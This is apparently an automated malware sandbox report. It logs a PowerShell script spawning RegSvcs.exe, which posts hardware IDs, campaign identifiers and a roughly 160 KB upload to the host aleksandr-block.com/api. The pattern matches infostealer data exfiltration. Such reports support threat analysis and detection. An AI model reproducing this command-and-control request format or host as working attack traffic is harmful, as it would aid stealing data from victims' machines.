                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9oUqpRmE8zTQHE6WpmnQrC50k4Tefi9DOR4%2B3V%2ByNKM%2F1gzuKBQvIbO7pqdzZfMB12HfngIS6xsvGF53rToHxD%2FGi5NINURbFsAcj5u7ts%2Ff9I5jdQw0rC%2BnRw884u%2Bq1UOY%2BgcW"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 901be7203e3c0f7d-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1613&rtt_var=622&sent=12&recv=26&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21355&delivery_rate=1736028&cwnd=227&unsent_bytes=0&cid=396f58d6ac794231&ts=629&x=0"
                                                                    2025-01-14 07:27:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                    Data Ascii: fok 8.46.123.189
                                                                    2025-01-14 07:27:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.449743188.114.96.34437608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-14 07:27:20 UTC282OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=ZZDEVCIVA5CI7BQ4
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 1387
                                                                    Host: aleksandr-block.com
                                                                    2025-01-14 07:27:20 UTC1387OUTData Raw: 2d 2d 5a 5a 44 45 56 43 49 56 41 35 43 49 37 42 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 31 36 30 39 33 38 32 32 43 33 38 41 46 31 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 5a 5a 44 45 56 43 49 56 41 35 43 49 37 42 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 5a 44 45 56 43 49 56 41 35 43 49 37 42 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 61 74 78 4f 54 31 2d 2d 74 72 61 66 66 31 32 0d 0a 2d 2d
                                                                    Data Ascii: --ZZDEVCIVA5CI7BQ4Content-Disposition: form-data; name="hwid"6316093822C38AF1B960CC18D99B375A--ZZDEVCIVA5CI7BQ4Content-Disposition: form-data; name="pid"1--ZZDEVCIVA5CI7BQ4Content-Disposition: form-data; name="lid"atxOT1--traff12--
                                                                    2025-01-14 07:27:21 UTC1131INHTTP/1.1 200 OK
                                                                    Date: Tue, 14 Jan 2025 07:27:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=dn7mibtp4kki3vp59f8rmsnkn2; expires=Sat, 10 May 2025 01:13:59 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    X-Frame-Options: DENY
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cVEWs8e0HHWcf71STvljN6p4fOm7%2B5cnOzbz5iFvRqXpQIl9K6fHl8XdYDlD%2FACOBwG1pEDmePdukihJaGpZ0cKG%2BHYo%2FsMNAzUwoCgJ9qbB4endTN7XLvM%2FWqDhlxOr0oT1ynsv"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 901be7282b2841d5-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1695&min_rtt=1691&rtt_var=643&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2305&delivery_rate=1691772&cwnd=226&unsent_bytes=0&cid=143517fed0669148&ts=1049&x=0"
                                                                    2025-01-14 07:27:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                    Data Ascii: fok 8.46.123.189
                                                                    2025-01-14 07:27:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    7192.168.2.449745188.114.96.34437608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-14 07:27:22 UTC279OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: multipart/form-data; boundary=LNGIR13QGV4
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 159730
                                                                    Host: aleksandr-block.com
                                                                    2025-01-14 07:27:22 UTC15331OUTData Raw: 2d 2d 4c 4e 47 49 52 31 33 51 47 56 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 31 36 30 39 33 38 32 32 43 33 38 41 46 31 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41 0d 0a 2d 2d 4c 4e 47 49 52 31 33 51 47 56 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 4e 47 49 52 31 33 51 47 56 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 61 74 78 4f 54 31 2d 2d 74 72 61 66 66 31 32 0d 0a 2d 2d 4c 4e 47 49 52 31 33 51 47 56 34 0d 0a 43 6f
                                                                    Data Ascii: --LNGIR13QGV4Content-Disposition: form-data; name="hwid"6316093822C38AF1B960CC18D99B375A--LNGIR13QGV4Content-Disposition: form-data; name="pid"1--LNGIR13QGV4Content-Disposition: form-data; name="lid"atxOT1--traff12--LNGIR13QGV4Co
                                                                    2025-01-14 07:27:22 UTC15331OUTData Raw: c2 0f ac ca df cd 5f 7e 9c 4b 94 71 4b 2d ac fe 34 86 25 55 78 33 a8 16 49 89 f4 95 29 26 91 3d 90 13 26 ce 9c d1 88 08 58 35 de 66 69 f7 bd f8 bb fe 2e cf 9d f3 5c 1f e9 ee bc b8 1f c2 26 94 dc 91 7e 43 f9 f2 ed 0d 0d a1 a5 97 1a c6 9f 92 5b e4 fa cd 22 50 d1 a0 03 04 55 6f 5e 3f 5d dd 67 dc ec 48 6d b2 45 67 d0 04 85 79 a4 06 f5 b7 61 0c ce 3f fb 7d 3d 9a df 65 e5 d0 ac b7 b6 c6 ed 96 56 7f 4f 3d 4d d9 f9 3b e7 cb ce d3 9f 9f ff 01 0f 94 52 be f3 6c e4 a1 ea f0 da 15 f8 09 32 ec 76 da 08 1a f8 bd d3 ea 3b ae 2e 9f 4a 54 32 22 c7 ee 30 fa 79 a5 1e 45 34 13 26 2f db 18 48 f5 b9 7f 58 ba 81 ac 3b 72 53 4b 69 f9 50 ea e1 00 39 f2 55 6c c0 da d7 db 32 a1 f2 48 96 f6 64 35 05 e5 96 f3 7a eb 2a 9c ef f0 5a 5c f6 a3 7a a5 d5 02 4b b7 56 2d 1c 78 3f 5d e4 b3 17
                                                                    Data Ascii: _~KqK-4%Ux3I)&=&X5fi.\&~C["PUo^?]gHmEgya?}=eVO=M;Rl2v;.JT2"0yE4&/HX;rSKiP9Ul2Hd5z*Z\zKV-x?]
                                                                    2025-01-14 07:27:22 UTC15331OUTData Raw: 4f a9 a8 0d 51 3d b3 70 de 47 6d 3a d4 6d e8 0e 05 4c a9 2b 5e 20 1e ac f5 a7 0b 12 a6 42 9a 8c 44 c0 4e bd 77 49 53 6d 77 69 9a f8 be 97 7e 6e 93 11 33 39 26 4a 6e 4a 53 23 99 8d 78 66 fb 15 30 4c 73 08 7f 0b 9f ac 79 88 dd ff c2 fa c4 3b 31 f5 26 5a eb 43 40 37 8c 1e c5 ee 1b 3e 82 d6 2b b7 cd 3a b8 75 70 0f 4f 4f f7 f7 c2 88 68 0b 10 5b f6 7f 3a 1b 4b 2e 71 74 70 71 de 41 94 bd c6 a5 93 a4 60 ac 90 d4 1e 8d 40 f3 45 ee 5d c1 8d 6c c7 d9 9f a9 17 2c 19 e1 4e d7 69 0b a1 9b dd 0a 93 8c e4 94 54 48 3f 8b d2 07 70 83 cd bc c9 47 91 c4 ee af 2d 2b de e1 98 7e d0 13 2a 5c df 94 82 3a f7 07 b9 62 16 c0 ee e1 c7 47 e2 bd f1 79 0f 05 ab 8f f6 c6 b0 3d 99 6e 9c 08 6b c9 fb b9 f0 9e f5 58 4b f9 8f b1 76 33 9b 16 2e f7 66 5a 20 1c d7 61 0c 59 65 bf 65 d6 40 84 78
                                                                    Data Ascii: OQ=pGm:mL+^ BDNwISmwi~n39&JnJS#xf0Lsy;1&ZC@7>+:upOOh[:K.qtpqA`@E]l,NiTH?pG-+~*\:bGy=nkXKv3.fZ aYee@x
                                                                    2025-01-14 07:27:22 UTC15331OUTData Raw: a0 a0 e7 a4 03 90 16 03 1b 20 13 ad 34 df ff 95 30 dd 26 09 d4 d9 2b 50 fb b1 1c 4f 12 67 3c 7f 54 2f cb 44 64 c6 a1 77 5a 8d b9 0c e4 68 a7 3d 23 ca 18 6f 0a a8 bf f6 18 e3 55 9b 39 72 c1 87 80 43 6f e9 cd fe 2e 34 71 bb 7e 9f c8 72 a6 29 a0 8d 15 eb bc 4b fa 9c d8 df ac a1 c3 9c 11 f5 a9 39 85 f6 38 4b 79 db 48 e4 f5 3f 6c 91 02 90 8a eb 04 02 07 d1 f0 cd 40 a2 b3 9b a0 5f d9 19 0d 4b b8 bd 55 7d 55 0a 52 53 0d ac e2 7f 68 93 d6 a1 dc 1e c1 31 f4 40 ce bd 0f 5c f1 fc da 71 e1 0c 7c 9d c7 bb 0b 36 9b c9 a5 37 9e 1d d8 5d 92 78 99 15 c9 2c 6f fa 86 86 8d ef 2e 29 75 62 10 11 e9 e8 5a b3 79 f4 c1 2e d1 6c 46 75 2b 6b c9 83 86 a6 e2 25 ae 0c 34 72 e8 a1 f7 0f cb 3f 9a 81 0d 32 08 24 af ca 5e 03 87 a1 cd 10 6f 42 7a bc 1f 91 d8 07 63 90 34 78 52 df 1a 7a 1f
                                                                    Data Ascii: 40&+POg<T/DdwZh=#oU9rCo.4q~r)K98KyH?l@_KU}URSh1@\q|67]x,o.)ubZy.lFu+k%4r?2$^oBzc4xRz
                                                                    2025-01-14 07:27:22 UTC15331OUTData Raw: 02 fc c2 50 f4 e5 06 4a 8c a7 5d 55 4d d6 a1 49 23 d4 69 f8 1c 05 20 9f 25 2a 6b f4 c8 1b 2f 1e a9 00 46 b4 63 c6 b8 a8 5f 0f 3a 99 48 ec 84 40 65 24 60 9d d9 1a 8e 02 6a f5 d0 2f 2b 7e 82 df ec ce c3 f7 97 aa 3c 9d de 56 6c 4d 65 9d 81 96 7a f3 ce b7 72 79 65 f9 ce 3f bf eb b5 f8 b9 c7 09 f2 9d dc 60 b8 e6 69 e3 a1 b0 7e ed 20 44 ea 1d a6 c0 7c fd af 0b ef 0a dc 1a 47 2d 78 55 f9 da 35 f6 83 ae 30 49 c3 02 6d 56 c3 90 cb ed e6 27 3b 16 8e 46 78 2e 5e 2c 27 72 e5 58 be 8a 87 0a eb cf ba b1 e6 7a bf 7c 89 7c d5 7c 11 7f da b0 5c 8f 71 6e f3 83 ca 91 54 47 cc 4a 26 fb 23 06 93 74 52 ea 1b 5d 55 22 03 70 5f 75 35 42 da a4 ae 5c c9 b2 fd 0d fb b1 e4 b2 8f d7 33 77 2c e3 e8 50 6d 68 22 53 e9 83 1d 9b 7c f7 79 23 2e 28 27 7e 2b 82 7b 27 9d f1 e1 8c 90 30 d1 e2
                                                                    Data Ascii: PJ]UMI#i %*k/Fc_:H@e$`j/+~<VlMezrye?`i~ D|G-xU50ImV';Fx.^,'rXz|||\qnTGJ&#tR]U"p_u5B\3w,Pmh"S|y#.('~+{'0
                                                                    2025-01-14 07:27:22 UTC15331OUTData Raw: 8c bf d2 af 4b 6a 6b a3 4c 76 e2 07 a6 20 07 cd b3 8c 48 ef 3b 2e e9 14 98 57 7c 55 e7 49 fe be 54 7e bb c4 83 eb b5 f1 01 33 eb ad 4f 79 02 66 d6 16 03 66 6a be 9e 75 bb d7 84 70 cb f5 e2 5f fc 8c 4e 3e 74 b9 8c 0f 79 e1 df bb 45 f4 3c f4 a3 cd 55 a5 10 34 ca ef 03 8b f2 45 0f 1a 9e 52 a2 ec bd d1 ef d8 0a 97 d5 87 ba 75 1f 6f 27 21 f8 b5 ce f1 ce 17 42 5b bb 8d 9c eb 43 8d a5 6e 76 58 6e 45 22 d1 44 b1 74 9c 45 b1 c2 87 97 67 fb 36 cf 22 d2 5e 98 a7 57 e1 e9 e6 57 55 5d be 6e e5 4b 21 c2 8c 98 bf de 89 02 93 f5 85 eb 73 34 b4 c6 8b 7a 84 9d bc 0f 9d fa 7c 55 06 1a 67 17 93 26 3a ad 30 c2 7e 0b 61 42 99 60 52 38 68 42 7f ad 9d a9 92 23 25 69 23 1d c1 6f e5 f1 10 4a d0 1b 41 aa ea 6b 62 b6 dd 88 cd 03 eb b5 b3 9d 6e 13 ed bc 8a 0f c6 28 12 15 dd 83 f5 92
                                                                    Data Ascii: KjkLv H;.W|UIT~3Oyffjup_N>tyE<U4ERuo'!B[CnvXnE"DtEg6"^WWU]nK!s4z|Ug&:0~aB`R8hB#%i#oJAkbn(
                                                                    2025-01-14 07:27:22 UTC15331OUTData Raw: 70 49 e6 b5 45 7f 65 03 f0 ee 76 d0 a9 e3 e6 31 6c 10 4f 9a a5 18 69 f2 bc ba 3c 34 d7 ce b1 11 4d 2d 97 e9 23 c7 d6 2d c2 c8 70 67 f5 dc bb ed 0a 03 f8 68 80 d2 a3 8e b8 c5 f7 77 36 ba 7f 17 7a d3 71 69 66 99 3f ef fc 11 7d b3 30 d5 eb b0 98 23 f7 39 dd f9 c0 f6 b1 fe 6a 59 e7 f1 ac f5 ba 5e fb bf 98 02 7b 19 08 79 86 ac 9f ae 5b 9e eb 18 eb 7a a7 8b 6a 81 0e 67 39 5c 97 d9 59 3f a5 c6 e8 a7 08 7f fe 4c cd ae f5 d0 c2 6b 48 7e 35 a0 78 76 24 bc 2d 25 67 04 f9 a4 ca d3 95 39 71 f8 6d 2e b9 49 c7 8f 39 b1 f7 cc 8b 30 27 2f 14 e3 19 a6 0f 95 1b b8 ce 54 1d dc f8 ff 29 3d 14 7b ca 64 20 43 e8 12 37 fc 16 95 ba 96 18 e2 be 39 bc f9 6c c4 7b 5e 2d f5 8f f6 b8 d9 34 cc d4 4f 2b d7 13 92 f3 d7 ba fa bd 60 cb f8 28 99 99 f2 28 d7 d9 e6 61 05 37 c2 6e 9e db c3 7a
                                                                    Data Ascii: pIEev1lOi<4M-#-pghw6zqif?}0#9jY^{y[zjg9\Y?LkH~5xv$-%g9qm.I90'/T)={d C79l{^-4O+`((a7nz
                                                                    2025-01-14 07:27:22 UTC15331OUTData Raw: 28 46 2a cc 29 1c 9b ac 3d 65 70 0f 93 97 74 0b 7f 33 37 c4 24 92 67 a5 f0 fa f4 bc 1c f5 80 46 85 2f a6 7e c7 bd 1e c4 a7 4e 07 f3 93 0b 20 ac 01 9b 11 b0 7e b2 7b 03 6f c2 0d 63 d8 cc 21 00 9c 7c 74 81 fe da b3 ef fc d5 2c ed d6 6a 93 f6 2a db 3a 54 7c db 00 c0 52 e2 e8 d9 b8 61 7c fa 96 27 13 ee 34 e6 ee ba c6 80 1c 2c e4 97 63 ca 0d 29 ac 52 d6 05 24 68 ed de 0b 43 a9 ae 8e 60 58 24 29 41 84 7c b2 d6 7e bf 56 6e 53 1d df cb 0d 3f 78 2a cc 9b e9 07 73 03 b8 e2 ca 4d 01 84 c5 ab b3 d8 93 53 f9 b7 8a dc 3c d5 b9 e2 df f3 d5 57 b5 e3 8b 3b f3 3d eb f8 ea 55 19 9f 4c c9 f0 1c c0 fa d5 db 90 0d 7e 8c a6 41 ea 8a a5 16 6b ea aa 0f 61 76 b9 24 ef 46 6f 69 a7 c4 b7 15 89 a3 5b a7 42 c5 04 52 6a f1 f8 a1 aa 02 0b 6e c6 27 07 ce 50 9f 4b aa ad 3f 2a f1 18 7b 5a
                                                                    Data Ascii: (F*)=ept37$gF/~N ~{oc!|t,j*:T|Ra|'4,c)R$hC`X$)A|~VnS?x*sMS<W;=UL~Akav$Foi[BRjn'PK?*{Z
                                                                    2025-01-14 07:27:22 UTC15331OUTData Raw: 6d 23 5b 81 1b 8d 4c f3 0e 4e d6 b1 ed 40 3e 6e c2 3c 7d 2e 1c a6 be 9e ae 30 0a 01 39 13 f4 77 8a 34 c4 d7 02 69 ff 5e e2 2f 37 c4 42 91 58 32 cd 05 2e d3 cd 15 81 d9 03 58 6a 0b 70 2f bf b0 f9 d9 a2 81 b8 29 c7 bd 50 dc 75 44 a2 97 cf e6 03 32 eb ee fc af 0d 93 77 53 b9 9a d8 06 7c 2a 4d cb 35 ce 88 1c d6 78 8d f1 d5 17 e1 df e4 72 51 44 b7 a5 a6 f9 52 dc 07 5d a8 1e d2 c9 ce 82 9f d5 07 98 7a e7 b4 a1 56 d3 76 c3 ba 9b 8a f8 bb bc fa ce 1b cf 15 ab 00 5e 6f 52 d0 94 f2 37 c8 1b 13 00 1c c0 89 4b df 90 c5 c0 26 52 5f 2e 9c 33 9b 19 f4 eb 1a 0d f7 94 14 f4 2d c4 8d 72 0d 59 d9 84 58 06 dd 96 f8 e2 7a 8e 33 5c 6f dc fd 43 e0 89 ce 22 52 fa 7a aa 5d a7 b0 0d 62 64 22 53 d9 52 e3 25 e3 c4 86 22 a0 61 89 fe 5e 96 f2 73 e5 be 9e 4d f7 de cd 08 22 43 db 95 df
                                                                    Data Ascii: m#[LN@>n<}.09w4i^/7BX2.Xjp/)PuD2wS|*M5xrQDR]zVv^oR7K&R_.3-rYXz3\oC"Rz]bd"SR%"a^sM"C
                                                                    2025-01-14 07:27:22 UTC15331OUTData Raw: a2 56 6a ab 91 c0 f4 6d 41 40 20 b0 3c b8 c5 74 a2 0e 51 ff 9d fa 8e 4a de 92 e2 22 88 a1 6e df 27 1c 2d 40 8f ad ec 74 f0 d0 db 8e 18 81 37 a6 df a8 93 ca ee d5 f8 47 98 11 01 6e 90 18 89 4e e2 89 68 d0 82 7d 04 b3 f7 1e f3 57 a1 9c 33 09 c5 71 69 bf c8 d2 2b ff 30 a2 cc 39 b1 cf 01 5a 38 45 95 15 3f 76 8b 64 e2 a4 ec c6 23 60 ba b2 46 b8 37 c7 4b e8 e3 6c 2c 5e 5d 70 a1 05 3c 55 96 b2 f6 a7 5e 68 de 52 65 b2 61 98 ed 2b 92 e2 7c 40 c9 05 d2 33 28 c8 15 fe 71 5e 5b d1 34 af 8d 59 72 50 a7 06 3b bb a3 e7 c9 fd a2 c6 03 f6 a6 8e f6 1d db 60 a1 21 9b a5 27 aa 45 47 a3 08 8d e8 27 97 98 c3 3f d6 19 ad f1 43 5a 36 e1 c7 f7 62 3c 30 4e 3f ac 7a 93 0a 77 59 1b 69 97 74 7a 30 18 db 45 60 fd b8 39 77 96 f0 fd 3d a7 5a 2a 86 8b 96 7d a6 96 6b ff 28 ad 97 3e 37 01
                                                                    Data Ascii: VjmA@ <tQJ"n'-@t7GnNh}W3qi+09Z8E?vd#`F7Kl,^]p<U^hRea+|@3(q^[4YrP;`!'EG'?CZ6b<0N?zwYitz0E`9w=Z*}k(>7
                                                                    2025-01-14 07:27:24 UTC1138INHTTP/1.1 200 OK
                                                                    Date: Tue, 14 Jan 2025 07:27:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=ib80huh0crnmri7htmldu3bpob; expires=Sat, 10 May 2025 01:14:02 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    X-Frame-Options: DENY
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gP%2B9KbACKCd4gkyMm5L%2FO%2Bnz07Z2joZb%2BeK%2BFkd9Vy7Y44TdYZq8U85oI10D4mEifS1mGhxsPDoNMWdjYoUXjtruz6dIqm%2B94qc7esrkC8cjrv142yTsVRDG8q4sGm0lQFE3KSdf"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 901be733de8b4288-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1673&min_rtt=1663&rtt_var=645&sent=59&recv=168&lost=0&retrans=0&sent_bytes=2846&recv_bytes=161085&delivery_rate=1669525&cwnd=246&unsent_bytes=0&cid=ecf3f35101f386cd&ts=2218&x=0"


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    8192.168.2.449748188.114.96.34437608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-14 07:27:24 UTC267OUTPOST /api HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                    Content-Length: 84
                                                                    Host: aleksandr-block.com
                                                                    2025-01-14 07:27:24 UTC84OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 61 74 78 4f 54 31 2d 2d 74 72 61 66 66 31 32 26 6a 3d 26 68 77 69 64 3d 36 33 31 36 30 39 33 38 32 32 43 33 38 41 46 31 42 39 36 30 43 43 31 38 44 39 39 42 33 37 35 41
                                                                    Data Ascii: act=get_message&ver=4.0&lid=atxOT1--traff12&j=&hwid=6316093822C38AF1B960CC18D99B375A
                                                                    2025-01-14 07:27:25 UTC1129INHTTP/1.1 200 OK
                                                                    Date: Tue, 14 Jan 2025 07:27:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Set-Cookie: PHPSESSID=l5hqj0qggl85blc3l6or3n5ban; expires=Sat, 10 May 2025 01:14:04 GMT; Max-Age=9999999; path=/
                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                    Pragma: no-cache
                                                                    X-Frame-Options: DENY
                                                                    X-Content-Type-Options: nosniff
                                                                    X-XSS-Protection: 1; mode=block
                                                                    cf-cache-status: DYNAMIC
                                                                    vary: accept-encoding
                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5GHo6GXNY%2BKJoNfGrznffWQlt4GZ9A6A%2BsRstkCerb6HvHczMVi%2BRIKbPwBpO3f2pNKWAJYLCzbkLWLKu46HUvxs5ANKpHjFgl6vqz2%2FN%2BEfKIwRaqoCX6qZkmIbe46RB3bG288N"}],"group":"cf-nel","max_age":604800}
                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                    Server: cloudflare
                                                                    CF-RAY: 901be744da6918b8-EWR
                                                                    alt-svc: h3=":443"; ma=86400
                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1611&rtt_var=613&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=987&delivery_rate=1773997&cwnd=186&unsent_bytes=0&cid=3612d3aa2bc894e1&ts=506&x=0"
                                                                    2025-01-14 07:27:25 UTC54INData Raw: 33 30 0d 0a 61 75 56 52 4d 69 6f 64 36 65 61 6d 73 42 57 31 4d 4f 71 63 61 51 30 43 6f 49 68 51 6a 65 6f 35 51 34 6c 71 36 55 78 79 48 4a 77 78 75 41 3d 3d 0d 0a
                                                                    Data Ascii: 30auVRMiod6eamsBW1MOqcaQ0CoIhQjeo5Q4lq6UxyHJwxuA==
                                                                    2025-01-14 07:27:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:02:27:08
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_2.112.ps1"
                                                                    Imagebase:0x7ff788560000
                                                                    File size:452'608 bytes
                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:1
                                                                    Start time:02:27:08
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7699e0000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:2
                                                                    Start time:02:27:11
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                    Imagebase:0x250000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:3
                                                                    Start time:02:27:11
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                    Imagebase:0x40000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:4
                                                                    Start time:02:27:11
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                    Imagebase:0xbe0000
                                                                    File size:45'984 bytes
                                                                    MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    Target ID:5
                                                                    Start time:02:27:11
                                                                    Start date:14/01/2025
                                                                    Path:C:\Windows\System32\wermgr.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "7408" "2496" "2432" "2500" "0" "0" "2468" "0" "0" "0" "0" "0"
                                                                    Imagebase:0x7ff783f90000
                                                                    File size:229'728 bytes
